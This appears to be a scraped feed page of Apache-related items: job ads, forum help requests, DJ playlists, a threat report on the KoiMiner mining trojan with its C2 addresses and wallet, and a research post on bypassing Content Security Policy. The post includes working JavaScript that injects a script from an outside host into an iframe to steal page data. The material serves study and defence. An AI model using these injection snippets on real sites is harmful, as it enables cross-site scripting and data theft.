Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Freelancer.com: Install self-renewing Letsencrypt SSL certificate on linux server      Cache   Translate Page   Web Page Cache   
Install a self-renewing Letsencrypt SSL certificate on a linux server associated with a domain. (Budget: $10 - $30 USD, Jobs: Apache, HTML, Linux, PHP, System Admin)
          Apache Struts2 High-Risk Vulnerability Lets Attackers Compromise Enterprise Servers and Install the KoiMiner Mining Trojan      Cache   Translate Page   Web Page Cache   
0×1 Overview  Many enterprise websites build their HTTP servers on Apache open-source projects, and a large share of those use the Apache sub-project Struts. Because the Apache Struts2 codebase contains many latent weaknesses, high-risk vulnerabilities have been disclosed repeatedly since 2007. According to figures published by Apache, 56 vulnerabilities (S2-001 through S2-056) were published between 2007 and 2018, including nine remote code execution (RCE) flaws. The high-risk S2-045 vulnerability (CVE-2017-5638), reported in March 2017, can lead to RCE when the Jakarta Multipart parser performs a file upload. It affects Struts 2.3.5 – 2.3.31 and Struts 2.5 – 2.5.10 and continues to be exploited in the wild. In April 2018, Tencent's Yujian Threat Intelligence Center observed a hacker group using this vulnerability to compromise web servers in bulk and plant mining trojans (see the article "Unpatched Apache Struts 2 Vulnerability Leads to Bulk Compromise of Web Servers"); recently the center has detected similar attacks again. In this campaign, the attackers use the tool WinStr045 to scan the network for vulnerable web servers. Once a vulnerable machine is found, they remotely execute commands to escalate privileges, create accounts and collect system information, then plant the downloader trojan mas.exe, which in turn fetches more malware from several C&C addresses: the privilege-escalation trojans o3.exe/o6.exe and the mining trojan netxmr4.0.exe. Because the netxmr miner decrypts its code and loads it under the module name "koi", the Tencent Yujian Threat Intelligence Center named the family KoiMiner. Interestingly, to make sure its own mining succeeds, the intruder checks the CPU consumption of system processes and terminates any process using more than 40% CPU, freeing those resources for mining. Based on code-provenance analysis, Yujian researchers believe this KoiMiner family may be a collaborative "practice" piece by several members of hacker forums and underground mining communities. Attack flow. (Note: Struts is a web application framework based on the MVC design pattern; it lets developers cleanly separate business-logic code from the presentation layer and concentrate on the business logic and its mapping configuration. Struts2 merges Struts and WebWork, combining the strengths of both, and handles user requests through an interceptor mechanism so the business logic is fully decoupled from the Servlet API.)  0×2 Detailed analysis  0×2.1 Intrusion. The tool first checks whether the target system is vulnerable to S2-045, then attacks vulnerable systems. It offers a menu of penetration commands (custom commands are also possible): common Windows/Linux post-exploitation commands, including viewing system version information, network connection state and open ports, adding a new user with administrator privileges, and enabling remote-connection services. A directory-listing command checks whether the trojan has already been planted in C:\Windows\Help or C:\ProgramData; if not, mas.exe is planted: one command first creates the C# source file mas.cs and writes the downloader code into it, then a second command compiles mas.cs into the executable mas.exe with the .NET compiler. A further command uses mas.exe to download the mining trojan netxmr4.0. Some of the attacked targets are listed below. The planted mas.exe is only 4 KB and resides in the ProgramData directory. Yujian's monitoring records show that mas.exe downloaded netxmr4.exe (the miner), o3.exe/o6.exe (privilege escalation) and several other trojans from multiple C2 addresses.  0×2.2 Privilege escalation. o3.exe exploits the MS16-032 vulnerability to elevate privileges.  0×2.3 Netxmr4.0  0×2.3.1 Code decryption. The Netxmr4.0 miner is written in C# and obfuscated with ConfuserEx. Before execution it decrypts its code with a built-in decryption function and then runs the decrypted module via C# reflection. The encrypted code is stored in the array array2; the decryption function Decrypt is called on it, and the result is stored in array3, where the PE file signature "4D5A" is visible. array3 is then loaded as the module "koi", yielding the final malicious code, which is executed through C# reflection.  0×2.3.2 Fighting for resources. Before mining, the trojan uses several methods to locate processes with high CPU usage, kills them and hides their files, ensuring ample resources for its own mining code: it terminates mining processes that are already running; it kills any process other than itself consuming more than 40% of CPU time and marks that process's file as hidden and access-denied for all users; and it kills taskmgr, svchost and csrss processes whose file version information does not contain "Microsoft Corporation.", likewise hiding their files and denying access to them.  0×2.3.3 Mining. If the miner's version is not "2010-2020", it downloads an updated miner from hxxp://50.232.75.165/. The C2 address holding the mining configuration is encrypted; the decryption routine reconstructs it through character reassembly plus base64 decoding, yielding hxxp://www.sufeinet.com/space-uid-97643.html. After decrypting the address, the trojan requests that C2 page and searches the response for strings beginning with "xMFOR" (excluding its own marker): NqNhbLWEgYNqNhb3J5cHJbiDQRvbml6kYu1naHQg3UtRpLW8gcMvQMr3RyYXfNwGtR1bStb7Imi0Y3A6OG8UJLy9wbK1U0829sLneS1uAN1cHBaCNRyvcnR4tdtM2bXIuYgmj3c29tOjdX5ZRMzMzMvxcUTgLXUgsiw0HNDQ4NB9UuKzNYYW8tpQ91lY2tu3f8jjNHdSDUC3mMjFBZXvjyoHJNNWUf5UdZub0ZGouCDIS1pKCZGh2U1ZqNW0nc5mNCQUTk98tRUZ0ZlCf3vUckVFiv1YkTjk0aV5qGMlAyWGSpClAZRWjckGjhC0UE1Sh15C1aXFvW0Sc74UhuQnmbSpeUyY0NjMnKTlMzJ32mKGVTHg3ZyXglJ0tIblIyChNFwZkZEiYCBxQ0xi1rOtlNlJ5bxcjQajIgLXH3GKdAgeCADncqStLWRvXF9lUbmF0ZUyVGIS1sZXG8KysZlbD0PyM6hx  Decrypting that string yields the mining configuration: -a cryptonight -o stratum+tcp://pool.supportxmr.com:3333 -u 44873Xameckc4wR21AdrM5fnoFHKZJSVj6cBADTgFTrEEN94jP2XfQZ74PMRiqoYHnBu2cCe32wLx7gKHnQpfFqCLb6Ryn2 -p x --donate-level=  Monero wallet: 44873Xameckc4wR21AdrM5fnoFHKZJSVj6cBADTgFTrEEN94jP2XfQZ74PMRiqoYHnBu2cCe32wLx7gKHnQpfFqCLb6Ryn2  Wallet earnings: querying this wallet at the Monero pool shows it has already earned about 16 XMR, and the balance is still growing at roughly one XMR per day, indicating that the trojan remains uncleaned on many infected machines. At the current price of about 924 CNY per XMR, the account has mined Monero worth roughly 15,000 CNY.  0×3 Lineage analysis  0×3.1 Multiple versions. Analysis of the several miner versions retrieved from the C2 address 50.232.75.165 shows that the author kept updating the trojan from 2018-05-13 to 2018-06-28. Comparing the code of the four versions found, the initial version has only basic mining functionality, while newer versions encrypt the C2 address, fetch the mining configuration from the cloud, and create multiple services to improve persistence; this suggests the author may have been developing the trojan while still learning. Code structure of historical versions: version 1.0, compiled 2018-05-13 22:37:18; version 2.0, compiled 2018-05-19 20:51:01; version 3.0, compiled 2018-05-26 10:55:02; version 4.0, compiled 2018-06-08 23:20:33.  0×3.2 […]
          Re: Apache server fails with the ERROR - at MoodleWindowsInstaller-latest-35.zip      Cache   Translate Page   Web Page Cache   
by Kahraman Bulut.  

Hi Leon,

Thanks for your reply.

Yes, it does not crash, but after 5-6 seconds it keeps coming back with this message (see attachment) [OS: Windows 7 Professional SP1]

httpd.exe and mysqld.exe are running as shown in TaskManager



          (USA-CA-Lake Forest) DevOps Architect - AWS, Linux, Top Company!      Cache   Translate Page   Web Page Cache   
DevOps Architect - AWS, Linux, Top Company! DevOps Architect - AWS, Linux, Top Company! - Skills Required - AWS, Bash, RUBY, Python, Puppet, Chef, Linux, Varnish, Public Cloud We are a top wireless communications company that focuses on location, messaging, and navigation. Our solutions provide cloud-based messaging platforms for Emergency Response and telemedicine technologies. We develop secure mobile and platform solutions for operators and enterprises worldwide. If you are a DevOps Architect with experience, please read on! **What You Will Be Doing** The DevOps Architect will lead a team of DevOps Engineers to build software, tools and automation supporting daily operational support to our division. Manages a portfolio of multiple projects, set priorities with measurable objectives. **What You Need for this Position** 10 years minimum of industry experience, both as individual contributor in a systems administration/engineering, DevOps role or engineering manager 5 years minimum experience managing the development of a hosted online automation, tools and services 7+ years of scripting skills, such as but not limited to Bash, Ruby, and Python Unix/Linux, TCP/IP, networking, systems programming and administration proficiency required Experience working with server side infrastructure within a Linux environment (e.g. DNS, SSH, Apache, NGINX, Varnish, etc.) 
Experience with AWS (Amazon Web Services) or Public Cloud is a plus Knowledge of automation and configuration management tools such as Puppet, Chef, CFEngine, Ansible Experience with SNMP is preferred (Simple Network Management Protocol) EL certifications a plus AWS Certifications a plus Experience with common online protocols: HTTP, SSL, DNS, SNMP, DHCP, TCP Proficient service architecture skills Ability to multi-task and manage tasks with varying priorities Bachelor of Science degree in Computer Science, Computer Engineering, Information Technology or equivalent experience **What's In It for You** Competitive base salary (paid for every hour worked - opportunity to earn significantly more) Paid time off Exceptionally priced medical, vision, and dental coverage Flexible spending opportunities Tuition reimbursement / Gym reimbursement Paid life insurance Incentive stock option plan On-site company gyms So, if you are a DevOps Architect with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *DevOps Architect - AWS, Linux, Top Company!* *CA-Lake Forest* *JRJ-1466842*
          (USA-CA-San Francisco) Data Engineer Spark -      Cache   Translate Page   Web Page Cache   
Data Engineer Spark - Data Engineer Spark - - Skills Required - Hadoop, SPARK, Linux, Engineer If you are a Data Engineer Spark with experience, please read on! **Top Reasons to Work with Us** Highly reputable **What You Will Be Doing** Develop custom ETL applications using Spark in Python/Java that follow a standard architecture. Success will be defined by the ability to meet requirements/acceptance criteria, delivery on-time, number of defects, and clear documentation. Perform functional testing, end-to-end testing, performance testing, and UAT of these applications and code written by other members of the team. Proper documentation of the test cases used during QA will be important for success. Other important responsibilities include clear communication with team members as well as timely and thorough code reviews. As you grow in the role, you will have the opportunity to contribute to designing of new applications, setting/changing standards and architecture, and deciding on usage of new technologies. **What You Need for this Position** Linux - common working knowledge, including navigating through the file system and simple bash scripting Hadoop - common working knowledge, including basic idea behind HDFS and map reduce, and hadoop fs commands. Spark - how to work with RDDs and Data Frames (with emphasis on data frames) to query and perform data manipulation. Python/Java - Python would be ideal but a solid knowledge of Java is also acceptable. SQL Source Control Management Tool - We use BitBucket Experience ---------- Worked/developed in a Linux or Unix environment. Worked in AWS (particularly EMR). Has real hands-on experience developing applications or scripts for a Hadoop environment (Cloudera, Hortonworks, MapR, Apache Hadoop). By that, we mean someone who has written significant code for at least one of these Hadoop distributions. 
Has experience with ANSI SQL relational database (Oracle, SQL, Postgres, MySQL) **What's In It for You** Great Salary and Benefits So, if you are a Data Engineer Spark with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Data Engineer Spark -* *CA-San Francisco* *RC4-1466982*
          Apache corodova download a pdf to device and display locally      Cache   Translate Page   Web Page Cache   
Provide javascript that uses corodova file and file transfer plugins to download a pdf from server save it locally to device and display that pdf. Code must work on Android and IOS (Budget: $30 - $250 NZD, Jobs: Android, Javascript, Linux, Mobile App Development, PHP)
          #dancelife - zorian_akai      Cache   Translate Page   Web Page Cache   
(*_-) #repost #me #bboy #bboyworld #bboyhiphop #bboycrazy #bboying #bboys #bboyfreeze #airbaby #airbabyfreeze😙 #love #lovedance #crazydance #dancelife #dancelifestyle #dancer #dancers #dancersofinstagram #apache #bike #160 #timepass #click #location #bodhi #gaya #bihar #india 🇮🇳🇮🇳🇮🇳
          How to set up Apache Virtual Hosts on Debian 9      Cache   Translate Page   Web Page Cache   

In this tutorial, we will show you how to set up Apache virtual hosts on Debian 9.
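The core of such a setup is one configuration file per site under /etc/apache2/sites-available/. A minimal sketch, with example.com standing in for a real domain and the paths being typical Debian defaults:

```apache
# /etc/apache2/sites-available/example.com.conf
<VirtualHost *:80>
    ServerName example.com
    ServerAlias www.example.com
    DocumentRoot /var/www/example.com/public_html
    ErrorLog ${APACHE_LOG_DIR}/example.com-error.log
    CustomLog ${APACHE_LOG_DIR}/example.com-access.log combined
</VirtualHost>
```

The site would then be enabled with `a2ensite example.com.conf` followed by `systemctl reload apache2`.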


          Impressive: Dubbo's Domain Has Changed, and It's No Longer Java-Only!      Cache   Translate Page   Web Page Cache   
Today I went to the Dubbo website to look up some material and found that the official domain dubbo.io now redirects straight to dubbo.apache.org. Then I remembered that Dubbo formally entered the Apache Incubator back in February, so it is no surprise. ![](http://p179cyr45.bkt.clouddn.com/18-7-9/56099502.jpg) The new site looks fresh and clean; compared with the old one, quite a few things have changed...
          Adam Bien: From JSF and PrimeFaces to WebComponents--A Conversation With Cagatay Civici      Cache   Translate Page   Web Page Cache   

An airhacks.fm podcast conversation with Cagatay Civici (@cagataycivici) about starting with Java, interfaces and return statements, IBM RAD JSF, Sun JSF Woodstock, Apache MyFaces, Apache MyFaces Tomahawk, JSF Chart Creator, Apache MyFaces Tobago, Oracle's ADF, YUI, jQuery and JSF, the non-dependency mindset, building complex UI components, Jakarta EE and microprofile, a scientific approach to design, choosing colors and color palletes, ideas for themes, standards and PrimeFaces, keeping up with Angular, React and WebComponents, StencilJS, PrimeFaces NG, an opensource model with commercial support, why "Prime", component sponsorship, performance under pressure and PrimeTek.

Subscribe to airhacks.fm podcast via: RSS iTunes

See you at Effective Progressive-, Offline-, Single Page-, Desktop Apps with Web Standards -- the "no frameworks, no migrations" approach, at Munich Airport, Terminal 2 or webcomponents.training (online).
Real World Java EE Workshops [Airport Munich]


          Comment on How To: Stop Apache DOS attacks with Fail2Ban by ekoariirawan      Cache   Translate Page   Web Page Cache   
Please help me. I have implemented SSH, FTP and HTTP authentication and everything is working, but the http-get-dos configuration does not: the IP address is not blocked, and there is already a log file at /var/log/apache/access.log. This is my jail.local config: [http-get-dos] enabled = true, port = http,https, filter = http-get-dos, logpath = /var/log/apache2/error.log, maxretry = 300, findtime = 300, bantime = 300, action = iptables[name=HTTP, port=http, protocol=tcp]. The failregex in /etc/fail2ban/filter.d/http-get-dos.conf is: failregex = ^ -.*"(GET|POST).* My setup runs on VMware with Ubuntu 14.04. Thank you, I really appreciate your help.
          Comment on How To: Stop Apache DOS attacks with Fail2Ban by ekoariirawan      Cache   Translate Page   Web Page Cache   
Please help me. I have implemented SSH, FTP and HTTP authentication and everything is working, but the http-get-dos configuration does not: the IP address is not blocked, and there is already a log file at /var/log/apache/access.log. This is my jail.local config: [http-get-dos] enabled = true, port = http,https, filter = http-get-dos, logpath = /var/log/apache2/YOUR_WEB_SERVER_ACCESS_LOG, # maxretry is how many GETs we can have in the findtime period before getting narky: maxretry = 300, # findtime is the time period in seconds in which we're counting "retries" (300 seconds = 5 mins): findtime = 300, # bantime is how long we should drop incoming GET requests for a given IP for, in this case it's 5 minutes: bantime = 300, action = iptables[name=HTTP, port=http, protocol=tcp]. Then again: [http-get-dos] enabled = true, port = http,https, filter = http-get-dos, logpath = /var/log/apache2/error.log, maxretry = 300, findtime = 300, bantime = 300, action = iptables[name=HTTP, port=http, protocol=tcp]. The failregex in /etc/fail2ban/filter.d/http-get-dos.conf is: failregex = ^ -.*"(GET|POST).* My setup runs on VMware with Ubuntu 14.04. Thank you, I really appreciate your help.
          Comment on How To: Stop Apache DOS attacks with Fail2Ban by r3dux      Cache   Translate Page   Web Page Cache   
Hmm... Is your webserver logging get requests? That is, is the logging level of the server sufficiently verbose? If it's only logging errors or such then it won't see the 'get' messages that fail2ban parses to put the temporary ban in place. Alternatively, is your site running HTTPS (typically port 443)? This setup is just for straight HTTP (port 80) and I haven't tried it with https, despite moving this site to use https. It's likely you'd have to modify the last line of the <b>jail.local</b> file to make sure it's looking for the right thing.
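For reference, the filter file that the jail's `filter = http-get-dos` line points at normally lives in /etc/fail2ban/filter.d/http-get-dos.conf. Reconstructed from the garbled failregex fragment quoted in the comments, it looks roughly like this (a sketch; `<HOST>` is the tag fail2ban substitutes to capture the client IP, and the regex should be adjusted to your access-log format):

```ini
[Definition]
# Match any GET/POST request line from a host in the Apache access log
failregex = ^<HOST> -.*"(GET|POST).*
ignoreregex =
```

Note that the commenter's pasted regex is missing the `<HOST>` tag, which by itself would prevent fail2ban from extracting an IP to ban.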
          Authorities Go After Morena Members in Puebla      Cache   Translate Page   Web Page Cache   
For breaking into the hotel where Morena members denounced PAN vote-rigging ("mapachera"), the Puebla Prosecutor's Office issued an arrest warrant against the party's local leader.
          CLUBcast 193      Cache   Translate Page   Web Page Cache   

CLUBcast is your home for the latest & greatest in Electronic Dance Music.

Mixed by Envisional

Twitter: @iamenvisional

Track List:

Birdy – Wild Horses (Sam Feldt Remix)

Alessia Cara & G-Eazy – Wild Things (Young Bombs Remix)

Cash Cash Feat. Sofia Reyes – How To Love (Boombox Cartel Remix)

Calvin Harris Feat. Rihanna – This Is What You Came For (Holl & Rush Bootleg)

Kill The Buzz Feat. Katt Niall – Galaxies

Mambo Brothers – Momento

Blinders – You Don’t Know

DBSTF – AFREAKA

Aylen – ZaZu

Timmy Trumpet & Angemi – Callab Bro

DJ Snake Feat. Bipolar Sunshine – Middle (MORTEN Remix)

Michael Mind – Don’t Stop The Rhythm (DJ Kuba & Neitan Remix)

Bassjackers – Fuck (Dimitri Vegas & Like Mike Edit)

Bojac – Six Million

TJR & Cardi B – Fuck Me Up

Burns – Run Things

Vicetone – Hawt Stuff

Dirty Ducks – Apache

Global Deejays & Danny Marquez Feat. Puppah Nas-T & Denise – Work (Nari & Milani Remix)

Dirty Rush & Gregor Es – Titans

Kaaze – Milk Man

Maddix & Jayden Jaxx – Voltage

Michael Mind – Booty Bounce

MOTi – Louder

NERVO & Nicky Romero – Let It Go (Kryder Remix)

 

 


          CLUBcast 167      Cache   Translate Page   Web Page Cache   

CLUBcast is your home for the Latest & Greatest Electronic Dance Music.

 

Mixed & Hosted by Envisional

 

1. Justin Bieber – What Do You Mean (2kool Remix)

2. Cazzette & Newtimers – Together (Lost Kings Remix)

3. Thomas Newson – Summer Vibes

4. Kryder & Dave Winnel – Apache

5. Deorro & Dirty Audio Feat. Miss Palmer – Without Love

6. Matisse & Sadko vs. Vigel – Tengu 

7. Tritonal – Gamma Gamma (J-Trick Remix) 

8. Goja – Gradient

9. Futuristic Polar Bears – Night Vision

10. Dzeko & Torres Feat. Delaney Jane – L’Amour Toujours (Tiesto Edit)

11. Garmiani & Sanjin – Jump & Sweat

12. Thomas Gold & Uberdrop – Souq

13. Azulae & Dropkillers – Game Over

14. Thomas Newson & Marco V Feat. Rumors – Together

15. James Egbert & Taylr Renee – Can’t Stay Here

16. Tujamo & Danny Avila – Cream

17. Galantis & GTA vs. Conro & Bali Bandits – Peanut Butter Nosehorn (Ronium & Wand England Mashup)

18. NewID & First Day Feat. IVAR – Show Me

19. Jebu – Consequences

 
Twitter.com/CLUBcastpodcast
Twitter.com/IAmEnvisional
Facebook.com/CLUBcastpodcast
Facebook.com/IAmEnvisional

          CLUBcast 165      Cache   Translate Page   Web Page Cache   
CLUBcast is your home for the latest & greatest Electronic Dance Music.
 
Hosted & Mixed by MP
 
TRACK LIST:
 
1. Jack Novak Ft. Blackbear - If It Kills Me
2. Axwell Λ Ingrosso - Sun Is Shining (W&W Remix)
3. Arston Ft. Jake Reese - Circle Track (Tom Fall Remix)
4. Dash Berlin Ft. Jonathan Mendelsohn - World Falls Apart (Thomas Gold Remix)
5. Lakros - Trinity
6. Yellow Claw & Dirtcaps - Smoke It
7. Julian Jordan - Lost Words
8. Aftershock - ID
9. Azulae & Dropkillers - Game Over
10. Conro & Bali Bandits - Nosehorn
11. Tritonal - Anchor (Simon & Phil Remix)
12. Jochen Miller Ft. Simone Nijssen - Slow Down
13. Quintino - Devotion
14. Kryder & Dave Winnel - Apache
 
UPCOMING EVENTS: 
-Sept. 4. MP @ Magic Kingdom 2:
https://www.facebook.com/events/1611899695735679/
 
-Oct. 24. MP @ Electronic Music Universe
http://www.electronicmusicuniverse.com
 
 
SOCIAL MEDIA:
https://www.facebook.com/CLUBcastpodcast
https://www.facebook.com/CLUBcastMP
https://www.twitter.com/CLUBcastpodcast
https://www.twitter.com/CLUBcastMP

          Re: PHP - Ubuntu 18.04: maximum upload limit is always 10Mo      Cache   Translate Page   Web Page Cache   
by Zied ALAYA.  

Thanks for the hint, but it did not solve my issue. I changed upload_max_filesize = 60M and post_max_size = 240M in all php.ini files and still get the same message: "The file 'file_name' is too large and cannot be uploaded".

$ sudo find -iname php.ini
./etc/php/7.0/apache2/php.ini
./etc/php/7.2/apache2/php.ini
./etc/php/7.2/cgi/php.ini
./etc/php/7.2/cli/php.ini
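Two things commonly bite here: Apache's PHP module reads the apache2 php.ini (not the cli one) and only picks up changes after a restart, and Moodle additionally enforces its own upload limits (a site-wide maximum plus per-course/activity settings), so raising PHP's limits alone may not change the message. A sketch of the relevant php.ini fragment, using the values from this thread:

```ini
; /etc/php/7.2/apache2/php.ini  (the file Apache's PHP module loads)
; post_max_size must be at least as large as upload_max_filesize
upload_max_filesize = 60M
post_max_size = 240M
```

After saving, restart Apache (`sudo systemctl restart apache2`), verify the effective values (e.g. on a phpinfo() page), and then review Moodle's "Maximum uploaded file size" settings.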


          DNS Server Configuration      Cache   Translate Page   Web Page Cache   
Configure the GoDaddy domain name with DNS configuration by adding records, with forwarding disabled. The website is running in Apache Tomcat on a private Synology NAS, like http://<PrivateIP>:Port/Directory. Budget: Rs... (Budget: ₹1500 - ₹12500 INR, Jobs: DNS, Linux, System Admin, Web Hosting)
          Linux System Administrator - Earth Resources Technology, Inc - Seattle, WA      Cache   Translate Page   Web Page Cache   
Apache webserver, Tomcat, BIND, Nagios and Nagvis, Snort, Gitlab, openDCIM, R-cran, ColdFusion, and Commonspot....
From Earth Resources Technology, Inc - Tue, 13 Mar 2018 19:23:29 GMT - View all Seattle, WA jobs
          Multi Site and https in Drupal8 - getting redirect to install.php      Cache   Translate Page   Web Page Cache   

I am trying to move my system to https, but Drupal doesn't seem to recognize my existing installation when using https instead of http. So I end up at install.php.

I have two entries for VirtualHost in the apache config.

<VirtualHost *:80>

<VirtualHost *:443>

They are identical besides the SSL directives. Especially ServerName and ServerAlias are the same.

sites.php contains:

<?php

$sites["www.goldgemaeuer.de"] = "goldgemaeuer";
$sites["goldgemaeuer.de"] = "goldgemaeuer";

$sites["443.goldgemaeuer.de"] = "goldgemaeuer";
$sites["443.www.goldgemaeuer.de"] = "goldgemaeuer";

With "goldgemaeuer" being a directory below "sites". But the directory seems to be ignored when using https. And I didn't find the configuration problem.

Any help is highly appreciated.

Werner

Drupal version: 

          Java Full-Stack Developer - STEL Solutions - Murcia, Spain      Cache   Translate Page   Web Page Cache   
We are looking for talent to join the development team of the company's flagship product, STEL Order (www.stelorder.com), the best-rated cloud- and mobile-based management and invoicing software. Requirements: experience developing back-end systems with Java J2EE and Apache Tomcat; experience working with database servers (MySQL and JPA); experience developing front-ends for web applications (HTML, CSS, JavaScript, jQuery and AJAX). ...
          ASTPP Installation and Configration      Cache   Translate Page   Web Page Cache   
ASTPP installation and configuration needed, covering the following tasks: 1. Install ASTPP. 2. Security: a. Apache authentication; b. secure FreeSWITCH; c. secure portal; d. Fail2ban. 3. Install Let's Encrypt (optional),... (Budget: $20 - $30 USD, Jobs: Apache, Asterisk PBX, Linux, PHP, VoIP)
          Neatly bypassing CSP – Wallarm      Cache   Translate Page   Web Page Cache   

How to trick CSP in letting you run whatever you want

By bo0om, Wallarm research

Content Security Policy or CSP is a built-in browser technology which helps protect from attacks such as cross-site scripting (XSS). It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascripts and more.

But what if we can give an example of successful XSS event when no unsafe resource origins are allowed? Read on to find out how.

How CSP works when all is well.

A common usage scenario is a CSP specifying that images may only be loaded from the current domain, which means that image tags pointing at external domains will be ignored.

A CSP policy is commonly used to block untrusted JS and minimize the chance of a successful XSS exploit.

Here is an example of allowing resources from the local domain (self) to be loaded and executed inline:

Content-Security-Policy: default-src 'self' 'unsafe-inline';

Since a security policy implies "prohibited unless explicitly allowed", this configuration prohibits the use of any function that executes code passed as a string. For example, eval, setTimeout and setInterval with string arguments will all be blocked, because unsafe-eval is not allowed.

Any content from external sources is also blocked, including images, css, websockets, and, especially, JS

To see for yourself how it works, check out this code where I deliberately put in an XSS exploit. Try to steal the secret this way without spooking the user, i.e. without a redirect.

Tricking CSP

Despite the limitations, we can still load scripts, create frames and put together images, because self does not prevent working with resources governed by the Same Origin Policy (SOP). Since CSP also applies to frames, the same policy governs frames created from data: or blob: URLs, or from documents formed with srcdoc.

So, can we really execute arbitrary JavaScript in a test file? The truth is out there.

We are going to rely on a neat trick here. Most modern browsers automatically convert files, such as text files or images, to an HTML page.

The reason for this behavior is to depict the content correctly in the browser window; it needs to have the right background, be centered and so on. However, an iframe is also a browser window! Thus, opening any file that is meant to be shown in the browser inside an iframe (e.g. favicon.ico or robots.txt) will immediately convert it into HTML, without any data validation, as long as the content-type is right.

What happens if a frame opens a site page that doesn't have a CSP header? You can guess the answer. Without CSP, an open frame will execute all the JS inside the page. If the page has an XSS exploit, we can inject our own JS into the frame.

To test this, let’s try a scenario which opens an iframe. Let’s use bootstrap.min.css, which we already mentioned earlier, as an example.

frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);

Let's take a look at what's in the frame. As expected, the CSS got converted into HTML and we managed to overwrite the content of head (even though it was empty to begin with). Now, let's see if we can get it to pull in an external JS file.

script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
window.frames[0].document.head.appendChild(script);

It worked! This is how we can execute an injection through an iframe, create our own JS scenario and query the parent window to steal its data.

All you need for an XSS exploit is to open an iframe and point it at any path that doesn't include a CSP header. It can be the standard favicon.ico, robots.txt, sitemap.xml, css/js, a jpg or other files.

PoC

Sleight of hand and no magic

What if the site developer was careful and every expected site response (200 OK) includes X-Frame-Options: Deny? We can still try to get in. The second common error in using CSP is a lack of protective headers on web server error responses. The simplest way to probe for this is to open a web page that doesn't exist. I noticed that many resources only include X-Frame-Options on responses with a 200 code, not with a 404.

If that is also accounted for, we can try causing the site to return a standard web-server “invalid request” message.

For example, to force NGINX to return "400 Bad Request", all you need to do is query one level above the web root at /../. To prevent the browser from normalizing the request and replacing /../ with /, we will URL-encode the dots and the last slash.

frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);

Another possibility here is passing an invalid percent-encoded path, e.g. /% or /%%z

However, the easiest way to get a web server to return an error is to exceed the allowed URL length. Most modern browsers can construct a URL far longer than a web server will accept: by default, web servers such as NGINX and Apache limit the request size to around 8 kB.

To try that, we can execute a similar scenario with a path length of 20,000 bytes:

frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);

Yet another way to fool the server into returning an error is to exceed the cookie length limit. Again, browsers support more and longer cookies than web servers can handle. Following the same scenario:

  1. Create a humongous cookie:
    for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};

2. Open an iframe using any address, which will cause the server to return an error (often without XFO or CSP)

3. Remove the humongous cookie:
for(var i=0;i<5;i++){document.cookie=i+"="}

4. Write your own js script into the frame that steals the parent’s secret

Try it for yourself. Here are some hints for you if you need them: PoC :)

There are many other ways to make the web server return an error; for example, we can send an over-long POST body or trigger a 500 server error some other way.

Why is CSP so gullible and what to do about it?

The simple underlying reason is that the policy controlling the resource is embedded within the resource itself.

To avoid these situations, my recommendations are:

  • CSP headers should be present on all pages, even on the error pages returned by the web server.
  • CSP options should be configured to restrict the rights to just those necessary for the specific resource. Try setting Content-Security-Policy-Report-Only: default-src 'none' and gradually adding permission rules for specific use cases.

If you have to use unsafe-inline for the resources to load and run correctly, your only protection is a nonce or hash-source. Otherwise you are exposed to XSS exploits, and if CSP doesn't protect against those, why have it in the first place?
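For example, a fresh nonce can be generated for each response and embedded in both the header and the permitted script tags (a sketch; the helper name and markup are mine):

```python
import secrets

def csp_with_nonce():
    """Build a per-response CSP header value plus a matching script tag."""
    nonce = secrets.token_urlsafe(16)  # unpredictable, regenerated per response
    header = "script-src 'self' 'nonce-{}'".format(nonce)
    script = '<script nonce="{}">/* inline code */</script>'.format(nonce)
    return header, script

header, script = csp_with_nonce()
print(header)
```

Because the nonce changes on every response, injected inline scripts (which cannot guess it) are blocked while your own tagged scripts still run.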

Additionally, as shared by @majorisc, another trick for stealing the data from a page is to use RTCPeerConnection and to pass the secret via DNS requests. default-src ‘self’ doesn’t protect from it, unfortunately.

Keep reading our blog for more tricks from our magic bag.


GitHub - Arachni/arachni: Web Application Security Scanner Framework

README.md

Arachni logo

Synopsis

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

